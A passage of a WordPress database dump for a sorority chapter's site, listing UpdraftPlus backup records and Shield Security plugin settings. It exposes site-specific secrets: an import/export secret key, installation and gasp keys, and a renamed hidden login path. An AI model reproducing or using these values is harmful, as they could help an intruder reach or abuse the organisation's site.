b3d04fd94b0825877192a8a3a45f635c68a1a42fb5580eb9\";s:7:\"others0\";s:64:\"80c1b60f3907f0832867aa04f26fed5d06ed78398b6c735fe701e3e4aebb5135\";s:3:\"db0\";s:64:\"3cf48cacbf7eeaad9980d26303d03bdb3d901950929ce07ffee6a5d05093ac0b\";}}s:5:\"nonce\";s:12:\"4299d32b2219\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:6:\"1.14.4\";s:12:\"is_multisite\";b:0;}i:1519106503;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-plugins.zip\";}s:12:\"plugins-size\";i:46584070;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-uploads.zip\";}s:12:\"uploads-size\";i:358228147;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-others.zip\";}s:11:\"others-size\";i:130776318;s:2:\"db\";s:72:\"backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-db.gz\";s:7:\"db-size\";i:1479493;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"5a5d1393a7660f1b078de9fcd82a41f472898fd2\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"520f3049f9e7f6873304fc05caeea0e183c1063f\";s:7:\"others0\";s:40:\"aad0d1d8071362837700d086cef100b8b416579a\";s:3:\"db0\";s:40:\"65fa68a723252f6f7f5348d8bd86ebe8441682e8\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"68f5a2a103232618e4d62c6d88ffd53b78467259aba6a711e6229756f7de75d2\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"6a5ef5aa2d0ec28468ec00a9a101f76e854bcf28124cc198b929cb1448d5f8e6\";s:7:\"others0\";s:64:\"ae23029ee30aff45a2e492b70368d29c6d3fb6c4915c8c1619c207569d0337e2\";s:3:\"db0\";s:64:\"a9ebfae8f88a1326948dea3189251a255adfcc9807bddd43f788d56ed7db6aa8\";}}s:5:\"nonce\";s:12:\"c2d68a8aec10\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:6:\"1.14.2\";s:12:\"is_multisite\";b:0;}i:1516515814;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-plugins.zip\";}s:12:\"plugins-size\";i:46357185;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-uploads.zip\";}s:12:\"uploads-size\";i:358080820;s:6:\"others\";a:1:{i:0;s:77:\"backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-others.zip\";}s:11:\"others-size\";i:130776318;s:2:\"db\";s:72:\"backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-db.gz\";s:7:\"db-size\";i:1838855;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"028eaa9e7e2e7a36de616436215b67c811585d2e\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"e6a81e47915c661a254b9f852ee8271c33515a62\";s:7:\"others0\";s:40:\"aad0d1d8071362837700d086cef100b8b416579a\";s:3:\"db0\";s:40:\"afe6167b52b5c1784882a814c6c41c9072dd43c1\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"08ca33b4fdee4d1f8be1493328a3c4ee6514bd200df2298fdb25ef281efd0ae1\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"1fd7c5bbb861db11bf187ab9b8dbb2f8a92d74453c0b241c37636a970dd79d35\";s:7:\"others0\";s:64:\"ae23029ee30aff45a2e492b70368d29c6d3fb6c4915c8c1619c207569d0337e2\";s:3:\"db0\";s:64:\"0f9cc28e1db62a1ca4bdc8281a92c5264e2445d70299a18490e7b98cf3dba80b\";}}s:5:\"nonce\";s:12:\"2f7535df1001\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:6:\"1.14.2\";s:12:\"is_multisite\";b:0;}i:1513922135;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-plugins.zip\";}s:12:\"plugins-size\";i:44804526;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-themes.zip\";}s:11:\"themes-size\";i:5395531;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-uploads.zip\";}s:12:\"uploads-size\";i:353930438;s:6:\"others\";a:1:{i:0;s:77:\"backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-others.zip\";}s:11:\"others-size\";i:129112267;s:2:\"db\";s:72:\"backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-db.gz\";s:7:\"db-size\";i:934422;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"ce5b0ad14a2eb2a10b86b7bdb15c9adeb2a60919\";s:7:\"themes0\";s:40:\"e7228c6a7c4c84870eb08480256907722a419aaf\";s:8:\"uploads0\";s:40:\"b626f4b65cd2ef09c1187314bc57373afdf94c6c\";s:7:\"others0\";s:40:\"4bfa8ad2ba89801a9d96fdde00fe19fcc29d08af\";s:3:\"db0\";s:40:\"850cc8f80b5675e79d0a57884db39bd69f19984f\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"fdb9ba267bc2e048c060202754fa5fe74feb40701767e68fefa3050d50665657\";s:7:\"themes0\";s:64:\"0d2a1138c2bb1bd00db7a8d78438e75e9b88afbde4d1e986b4334d3ef8b49912\";s:8:\"uploads0\";s:64:\"32f33f578b5f218fac7ab4e6bc00700a0ad5ed2e1a4b048c04ca294165450c39\";s:7:\"others0\";s:64:\"626660f70eb9f76938d8f24bdbe0e1de61ee248915e41e055bed7ef1c68e48f4\";s:3:\"db0\";s:64:\"02aa30ae60645ade9d0a738511a056fbeac92a044ec48b7927c3d11dc18fc93e\";}}s:5:\"nonce\";s:12:\"7e35b1e7831a\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:7:\"1.13.11\";s:12:\"is_multisite\";b:0;}i:1511331122;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-plugins.zip\";}s:12:\"plugins-size\";i:43888426;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-themes.zip\";}s:11:\"themes-size\";i:5395531;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-uploads.zip\";}s:12:\"uploads-size\";i:353256125;s:6:\"others\";a:1:{i:0;s:77:\"backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-others.zip\";}s:11:\"others-size\";i:129039213;s:2:\"db\";s:72:\"backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-db.gz\";s:7:\"db-size\";i:857980;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"0dbecdf7ae83e039522e9045b8985639bfde2028\";s:7:\"themes0\";s:40:\"e7228c6a7c4c84870eb08480256907722a419aaf\";s:8:\"uploads0\";s:40:\"886196c52217f763788632216d4f88339b338948\";s:7:\"others0\";s:40:\"c082e1859f1149d0a094b4d2825ffbc52aa155e4\";s:3:\"db0\";s:40:\"c6a145bfac4049e36772dba3a841f467313aac08\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"64520bf9eb504bd76468bf3323b7586354246db10907d7c262eafd574034f58b\";s:7:\"themes0\";s:64:\"0d2a1138c2bb1bd00db7a8d78438e75e9b88afbde4d1e986b4334d3ef8b49912\";s:8:\"uploads0\";s:64:\"cacdc230b318a557aabc52bcc1d5b24b6270e0e47bb4168f6dc55961fab97a21\";s:7:\"others0\";s:64:\"142840f2bbe9444c3dea57af5d6838c543b9cf71d08b5ae0c91afd4c4642bf54\";s:3:\"db0\";s:64:\"1d3dda8850701b5672df0081df6b01d834bd73cc544b16ef45253ab4d5f46da3\";}}s:5:\"nonce\";s:12:\"9fe3f4facca8\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:7:\"1.13.11\";s:12:\"is_multisite\";b:0;}i:1508737719;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-plugins.zip\";}s:12:\"plugins-size\";i:39268143;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-themes.zip\";}s:11:\"themes-size\";i:5395519;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-uploads.zip\";}s:12:\"uploads-size\";i:332550002;s:6:\"others\";a:1:{i:0;s:77:\"backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-others.zip\";}s:11:\"others-size\";i:129039213;s:2:\"db\";s:72:\"backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-db.gz\";s:7:\"db-size\";i:848255;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"cc980543b92cf0df22900e10fdd307cc67359052\";s:7:\"themes0\";s:40:\"13d39b6a95117e90c4f86166a0591998da511199\";s:8:\"uploads0\";s:40:\"0a7247fc480f4a474ed228c29a49e461840e2d3f\";s:7:\"others0\";s:40:\"5c6c7633431993168e9926ef57568a1531895742\";s:3:\"db0\";s:40:\"a3283af2f8e739ea2a17476862c2e9aae81405cd\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"01d87be42aafee0c4d18d355bfd22c68d0f399871f7387adab7f561022dd8110\";s:7:\"themes0\";s:64:\"2c11cb162b2d99aecb3035ea7a7432d13497034e462275674e78dc569637edad\";s:8:\"uploads0\";s:64:\"d08d40c08a4aeab874c9a05c066bbc0acc8147ba8f707a629d80713339f02813\";s:7:\"others0\";s:64:\"0671baf076d3b0cc05dbf4f244978ba61ff3a479c0f0d80de7f21a6f410dc44e\";s:3:\"db0\";s:64:\"b371d2876821241240c5717c5eb038ce6e46c2f0a6a134b64829d85179a6a2b4\";}}s:5:\"nonce\";s:12:\"781d0d2ea340\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:18:\"created_by_version\";s:7:\"1.13.11\";s:12:\"is_multisite\";b:0;}i:1508736448;a:16:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-plugins.zip\";}s:12:\"plugins-size\";i:39268143;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-themes.zip\";}s:11:\"themes-size\";i:5395519;s:7:\"uploads\";a:1:{i:0;s:78:\"backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-uploads.zip\";}s:12:\"uploads-size\";i:332550002;s:6:\"others\";a:1:{i:0;s:77:\"backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-others.zip\";}s:11:\"others-size\";i:129039213;s:2:\"db\";s:72:\"backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-db.gz\";s:7:\"db-size\";i:846354;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"cc980543b92cf0df22900e10fdd307cc67359052\";s:7:\"themes0\";s:40:\"13d39b6a95117e90c4f86166a0591998da511199\";s:8:\"uploads0\";s:40:\"dc2a7da43ba80e4ba3ca45c2a836b7219a64866f\";s:7:\"others0\";s:40:\"60995de2104307ea54c685f34d3c307d1fa89d4e\";s:3:\"db0\";s:40:\"0e2dc924780d79fc3fff8ad789816084864be866\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"01d87be42aafee0c4d18d355bfd22c68d0f399871f7387adab7f561022dd8110\";s:7:\"themes0\";s:64:\"2c11cb162b2d99aecb3035ea7a7432d13497034e462275674e78dc569637edad\";s:8:\"uploads0\";s:64:\"561e38b81596b1155004077142cba00e1152e894614a4233bb84e440c57aaea4\";s:7:\"others0\";s:64:\"d9826728da3048e3418cdbc6499e880a1824e8560e168844b0e3a8cb808337a5\";s:3:\"db0\";s:64:\"73675729433f5972aca0c259f10412130278633be81f860aa320ebaae0d39dc1\";}}s:5:\"nonce\";s:12:\"6e8217318838\";s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-80ce4c8c8dee7f62a9b2b9e22994c990\";}}s:18:\"created_by_version\";s:7:\"1.13.11\";s:12:\"is_multisite\";b:0;}}','no'),(56175,'icwp_wpsf_plugin_options','a:32:{s:26:\"tracking_permission_set_at\";i:0;s:22:\"visitor_address_source\";s:11:\"REMOTE_ADDR\";s:20:\"display_plugin_badge\";s:1:\"N\";s:15:\"enable_tracking\";s:1:\"N\";s:29:\"global_enable_plugin_features\";s:1:\"Y\";s:27:\"enable_upgrade_admin_notice\";s:1:\"Y\";s:17:\"installation_time\";i:1508738118;s:25:\"google_recaptcha_site_key\";s:0:\"\";s:27:\"google_recaptcha_secret_key\";s:0:\"\";s:22:\"unique_installation_id\";s:40:\"0afe7eeac55c8017d0b814fe6d3290742f95addb\";s:18:\"help_video_options\";a:0:{}s:24:\"block_send_email_address\";s:0:\"\";s:20:\"delete_on_deactivate\";s:1:\"N\";s:21:\"tracking_last_sent_at\";i:0;s:22:\"google_recaptcha_style\";s:5:\"light\";s:22:\"importexport_secretkey\";s:40:\"ff20250f9378ffae7d188296cd489e82fe435832\";s:33:\"importexport_secretkey_expires_at\";i:1632345706;s:22:\"importexport_whitelist\";a:0:{}s:22:\"importexport_masterurl\";s:0:\"\";s:19:\"importexport_enable\";s:1:\"Y\";s:27:\"enable_xmlrpc_compatibility\";s:1:\"N\";s:21:\"last_ip_detect_source\";s:11:\"REMOTE_ADDR\";s:12:\"activated_at\";i:0;s:20:\"cache_dir_write_test\";a:2:{s:12:\"last_test_at\";i:1632342106;s:15:\"last_success_at\";i:1632342106;}s:11:\"cfg_version\";s:5:\"9.0.4\";s:16:\"captcha_provider\";s:10:\"grecaptcha\";s:18:\"captcha_checked_at\";i:-1;s:12:\"enable_wpcli\";s:1:\"Y\";s:17:\"dismissed_notices\";b:0;s:15:\"locale_override\";s:0:\"\";s:13:\"show_advanced\";s:1:\"Y\";s:16:\"enable_shieldnet\";s:1:\"Y\";}','yes'),(56087,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-8c8f28c20007a331adbf107e9828fd50\";a:1:{s:15:\"tk_access_token\";s:1:\"0\";}}}','yes'),(56129,'updraftplus_unlocked_','1','no'),(56130,'updraftplus_last_lock_time_','2017-10-23 05:50:32','no'),(56131,'updraftplus_semaphore_','0','no'),(56179,'icwp_wpsf_loginprotect_options','a:26:{s:20:\"enable_login_protect\";s:1:\"Y\";s:13:\"text_imahuman\";s:7:\"default\";s:19:\"text_pleasecheckbox\";s:7:\"default\";s:18:\"help_video_options\";a:0:{}s:29:\"enable_google_recaptcha_login\";s:8:\"disabled\";s:23:\"enable_login_gasp_check\";s:1:\"Y\";s:20:\"login_limit_interval\";i:10;s:29:\"enable_chained_authentication\";s:1:\"Y\";s:27:\"enable_google_authenticator\";s:1:\"N\";s:27:\"enable_email_authentication\";s:1:\"N\";s:26:\"two_factor_auth_user_roles\";a:1:{i:0;s:10:\"subscriber\";}s:19:\"rename_wplogin_path\";s:13:\"webmaster1920\";s:14:\"enable_yubikey\";s:1:\"N\";s:14:\"yubikey_app_id\";s:0:\"\";s:15:\"yubikey_api_key\";s:0:\"\";s:26:\"email_can_send_verified_at\";i:-1;s:8:\"gasp_key\";s:13:\"59ed858ee3fd7\";s:21:\"use_login_intent_page\";b:1;s:8:\"mfa_skip\";i:0;s:24:\"bot_protection_locations\";a:3:{i:0;s:5:\"login\";i:1;s:8:\"register\";i:2;s:8:\"password\";}s:17:\"allow_backupcodes\";s:1:\"N\";s:16:\"antibot_form_ids\";a:0:{}s:18:\"email_any_user_set\";s:1:\"N\";s:11:\"cfg_version\";s:5:\"9.0.4\";s:20:\"enable_antibot_check\";s:1:\"N\";s:10:\"enable_u2f\";s:1:\"N\";}','yes'),(429647,'icwp_wpsf_reporting_options','a:3:{s:16:\"enable_reporting\";s:1:\"Y\";s:14:\"frequency_info\";s:6:\"weekly\";s:15:\"frequency_alert\";s:5:\"daily\";}','yes'),(138021,'icwp_wpsf_traffic_options','a:6:{s:14:\"enable_traffic\";s:1:\"N\";s:10:\"auto_clean\";i:3;s:17:\"custom_exclusions\";a:0:{}s:14:\"enable_limiter\";s:1:\"N\";s:20:\"legacy_db_deleted_at\";s:10:\"1632315672\";s:15:\"type_exclusions\";a:6:{i:0;s:9:\"logged_in\";i:1;s:6:\"server\";i:2;s:4:\"cron\";i:3;s:6:\"search\";i:4;s:6:\"uptime\";i:5;s:6:\"server\";}}','yes'),(56180,'icwp_wpsf_user_management_options','a:17:{s:22:\"enable_user_management\";s:1:\"N\";s:37:\"enable_admin_login_email_notification\";s:0:\"\";s:33:\"session_username_concurrent_limit\";i:0;s:24:\"session_timeout_interval\";i:2;s:15:\"pass_min_length\";i:12;s:17:\"pass_min_strength\";s:1:\"4\";s:19:\"pass_force_existing\";s:1:\"N\";s:11:\"pass_expire\";i:60;s:36:\"enable_user_login_email_notification\";s:1:\"N\";s:29:\"session_idle_timeout_interval\";i:48;s:14:\"manual_suspend\";s:1:\"N\";s:13:\"auto_password\";s:1:\"Y\";s:14:\"auto_idle_days\";i:0;s:15:\"auto_idle_roles\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:11:\"cfg_version\";s:5:\"9.0.4\";s:12:\"email_checks\";a:2:{i:0;s:6:\"syntax\";i:2;s:17:\"domain_registered\";}s:18:\"reg_email_validate\";s:3:\"log\";}','yes'),(56181,'icwp_wpsf_commentsfilter_options','a:9:{s:22:\"enable_comments_filter\";s:1:\"N\";s:31:\"google_recaptcha_style_comments\";s:7:\"default\";s:17:\"comments_cooldown\";i:30;s:16:\"human_spam_items\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}s:18:\"trusted_user_roles\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:11:\"cfg_version\";s:5:\"9.0.4\";s:34:\"comments_default_action_human_spam\";s:1:\"0\";s:32:\"comments_default_action_spam_bot\";s:4:\"spam\";s:20:\"enable_antibot_check\";s:1:\"N\";}','yes'),(56182,'icwp_wpsf_autoupdates_options','a:10:{s:18:\"enable_autoupdates\";s:1:\"Y\";s:29:\"enable_autoupdate_disable_all\";s:1:\"N\";s:33:\"enable_upgrade_notification_email\";s:0:\"\";s:25:\"enable_autoupdate_plugins\";s:1:\"N\";s:15:\"autoupdate_core\";s:10:\"core_minor\";s:12:\"update_delay\";i:0;s:14:\"delay_tracking\";a:3:{s:4:\"core\";a:1:{s:2:\"wp\";a:5:{s:5:\"5.6.4\";i:1620870366;s:3:\"5.8\";i:1626847009;s:5:\"5.8.1\";i:1631162727;s:5:\"5.7.3\";i:1631162727;s:5:\"5.6.5\";i:1631162727;}}s:7:\"plugins\";a:29:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";a:3:{s:4:\"7.46\";i:1628700067;s:4:\"7.47\";i:1630428308;s:4:\"7.48\";i:1632315586;}s:16:\"gotmls/index.php\";a:3:{s:7:\"4.19.69\";i:1589777458;s:7:\"4.20.59\";i:1621183925;s:7:\"4.20.72\";i:1623818081;}s:36:\"contact-form-7/wp-contact-form-7.php\";a:3:{s:3:\"5.4\";i:1614184521;s:5:\"5.4.1\";i:1619714293;s:5:\"5.4.2\";i:1626280393;}s:39:\"contact-form-7-paypal-add-on/paypal.php\";a:3:{s:5:\"1.5.6\";i:1526963443;s:5:\"1.5.7\";i:1527569001;s:3:\"1.6\";i:1530505730;}s:37:\"download-manager/download-manager.php\";a:3:{s:6:\"2.9.75\";i:1530636260;s:6:\"2.9.76\";i:1530643679;s:6:\"2.9.77\";i:1533660106;}s:25:\"duplicator/duplicator.php\";a:3:{s:5:\"1.4.1\";i:1622092443;s:5:\"1.4.2\";i:1625720636;s:5:\"1.4.3\";i:1631162727;}s:41:\"better-wp-security/better-wp-security.php\";a:3:{s:5:\"7.8.0\";i:1597379474;s:5:\"7.9.0\";i:1602650589;s:5:\"7.9.1\";i:1618461338;}s:27:\"ninja-forms/ninja-forms.php\";a:3:{s:5:\"3.5.8\";i:1631075643;s:7:\"3.5.8.1\";i:1631766502;s:7:\"3.5.8.2\";i:1632284998;}s:28:\"swiftype-search/swiftype.php\";a:2:{s:6:\"1.1.49\";i:1518496173;s:6:\"1.1.50\";i:1533359350;}s:27:\"updraftplus/updraftplus.php\";a:3:{s:7:\"1.16.59\";i:1626453635;s:7:\"1.16.60\";i:1629392258;s:7:\"1.16.61\";i:1630216034;}s:27:\"woocommerce/woocommerce.php\";a:3:{s:5:\"3.4.2\";i:1528216938;s:5:\"3.4.3\";i:1529555763;s:5:\"3.4.4\";i:1532580394;}s:31:\"wp-statistics/wp-statistics.php\";a:3:{s:8:\"12.3.6.2\";i:1529642860;s:8:\"12.3.6.3\";i:1529684910;s:8:\"12.3.6.4\";i:1531844914;}s:24:\"wordpress-seo/wp-seo.php\";a:3:{s:4:\"17.0\";i:1629823077;s:4:\"17.1\";i:1631036178;s:4:\"17.2\";i:1632242451;}s:41:\"powr-paypal-button/powr-paypal-button.php\";a:1:{s:5:\"1.6.4\";i:1518755369;}s:19:\"akismet/akismet.php\";a:3:{s:6:\"4.1.10\";i:1625632638;s:6:\"4.1.11\";i:1629781507;s:6:\"4.1.12\";i:1630732603;}s:32:\"wp-simple-firewall/icwp-wpsf.php\";a:3:{s:6:\"11.5.4\";i:1628094645;s:6:\"12.0.3\";i:1632315586;s:6:\"12.0.4\";i:1632328151;}s:30:\"login-sidebar-widget/login.php\";a:3:{s:5:\"6.0.7\";i:1599497324;s:5:\"6.0.8\";i:1608741210;s:5:\"6.0.9\";i:1610642705;}s:27:\"wordpress-popup/popover.php\";a:3:{s:5:\"7.4.3\";i:1613752143;s:5:\"7.4.4\";i:1618634218;s:7:\"7.4.5.2\";i:1629736157;}s:33:\"w3-total-cache/w3-total-cache.php\";a:3:{s:5:\"2.1.6\";i:1628225057;s:5:\"2.1.7\";i:1630600317;s:5:\"2.1.8\";i:1631075643;}s:33:\"theme-my-login/theme-my-login.php\";a:3:{s:5:\"7.1.1\";i:1596909009;s:5:\"7.1.2\";i:1605848388;s:5:\"7.1.3\";i:1615568163;}s:69:\"styles-and-layouts-for-gravity-forms/styles-layouts-gravity-forms.php\";a:3:{s:5:\"4.3.1\";i:1617468195;s:5:\"4.3.2\";i:1626453635;s:5:\"4.3.3\";i:1630687057;}s:57:\"easy-paypal-events-tickets/easy-paypal-events-tickets.php\";a:1:{s:5:\"1.1.1\";i:1529124913;}s:52:\"mailchimp-forms-by-mailmunch/mailchimp-mailmunch.php\";a:3:{s:5:\"3.1.2\";i:1544200385;s:5:\"3.1.3\";i:1556599264;s:5:\"3.1.4\";i:1576126055;}s:41:\"admin-custom-login/admin-custom-login.php\";a:3:{s:5:\"3.2.7\";i:1627058094;s:5:\"3.2.8\";i:1627191544;s:5:\"3.2.9\";i:1630772984;}s:43:\"gf-form-multicolumn/gf-form-multicolumn.php\";a:3:{s:6:\"3.2.0a\";i:1625848430;s:5:\"3.2.0\";i:1626367886;s:5:\"3.2.1\";i:1627361412;}s:35:\"obfuscate-email/obfuscate-email.php\";a:3:{s:5:\"3.6.1\";i:1578158079;s:3:\"3.7\";i:1593620911;s:5:\"3.8.1\";i:1618418670;}s:21:\"raw-html/raw_html.php\";a:3:{s:5:\"1.6.1\";i:1561393751;s:5:\"1.6.2\";i:1581612443;s:5:\"1.6.3\";i:1593016219;}s:19:\"keyring/keyring.php\";a:1:{s:3:\"3.0\";i:1614572953;}s:53:\"import-eventbrite-events/import-eventbrite-events.php\";a:1:{s:5:\"1.6.2\";i:1622868165;}}s:6:\"themes\";a:3:{s:14:\"twentynineteen\";a:3:{s:3:\"1.9\";i:1608697854;s:3:\"2.0\";i:1615352290;s:3:\"2.1\";i:1627014994;}s:12:\"twentytwenty\";a:3:{s:3:\"1.6\";i:1607489149;s:3:\"1.7\";i:1615352290;s:3:\"1.8\";i:1627014994;}s:15:\"twentytwentyone\";a:3:{s:3:\"1.2\";i:1615352290;s:3:\"1.3\";i:1619497735;s:3:\"1.4\";i:1627014994;}}}s:22:\"autoupdate_plugin_self\";s:4:\"auto\";s:24:\"enable_autoupdate_themes\";s:1:\"N\";s:22:\"override_email_address\";s:0:\"\";}','yes'),(56183,'icwp_wpsf_hack_protect_options','a:21:{s:19:\"enable_hack_protect\";s:1:\"Y\";s:31:\"enable_core_file_integrity_scan\";s:1:\"Y\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:19:\"enabled_delete_only\";s:14:\"ufc_exclusions\";a:8:{i:0;s:9:\"error_log\";i:1;s:9:\".htaccess\";i:2;s:9:\".htpasswd\";i:3;s:9:\".user.ini\";i:4;s:7:\"php.ini\";i:5;s:10:\"web.config\";i:6;s:12:\"php_mail.log\";i:7;s:8:\"mail.log\";}s:16:\"ufc_scan_uploads\";s:1:\"N\";s:18:\"help_video_options\";a:0:{}s:18:\"enable_wpvuln_scan\";s:1:\"Y\";s:22:\"wpvuln_scan_autoupdate\";s:1:\"N\";s:14:\"scan_frequency\";s:1:\"1\";s:10:\"ptg_enable\";s:1:\"Y\";s:16:\"enabled_scan_apc\";s:1:\"Y\";s:15:\"mal_scan_enable\";s:1:\"Y\";s:19:\"ptg_reinstall_links\";s:1:\"Y\";s:23:\"mal_autorepair_surgical\";s:1:\"N\";s:12:\"is_scan_cron\";b:0;s:14:\"scans_to_build\";a:0:{}s:17:\"file_repair_areas\";a:0:{}s:11:\"file_locker\";a:0:{}s:11:\"cfg_version\";s:5:\"9.0.4\";s:20:\"scan_path_exclusions\";a:10:{i:0;s:17:\"wp-content/cache/\";i:1;s:18:\"wp-content/nfwlog/\";i:2;s:18:\"wp-content/wflogs/\";i:3;s:11:\"*/error_log\";i:4;s:15:\"*/php_error_log\";i:5;s:10:\"*/mail.log\";i:6;s:14:\"*/php_mail.log\";i:7;s:23:\"*/.stylelintrc-css.json\";i:8;s:19:\"*/.stylelintrc.json\";i:9;s:14:\"*/sucuri-*.php\";}s:19:\"auto_filter_results\";s:1:\"Y\";}','yes'),(56184,'icwp_wpsf_headers_options','a:7:{s:14:\"enable_headers\";s:1:\"Y\";s:17:\"x_referrer_policy\";s:10:\"unsafe-url\";s:7:\"x_frame\";s:13:\"on_sameorigin\";s:13:\"x_xss_protect\";s:1:\"Y\";s:14:\"x_content_type\";s:1:\"Y\";s:32:\"enable_x_content_security_policy\";s:1:\"N\";s:11:\"xcsp_custom\";a:0:{}}','yes'),(56185,'icwp_wpsf_lockdown_options','a:9:{s:15:\"enable_lockdown\";s:1:\"Y\";s:20:\"disable_file_editing\";s:1:\"N\";s:15:\"force_ssl_admin\";s:1:\"N\";s:28:\"hide_wordpress_generator_tag\";s:1:\"N\";s:22:\"block_author_discovery\";s:1:\"Y\";s:14:\"disable_xmlrpc\";s:1:\"N\";s:25:\"disable_anonymous_restapi\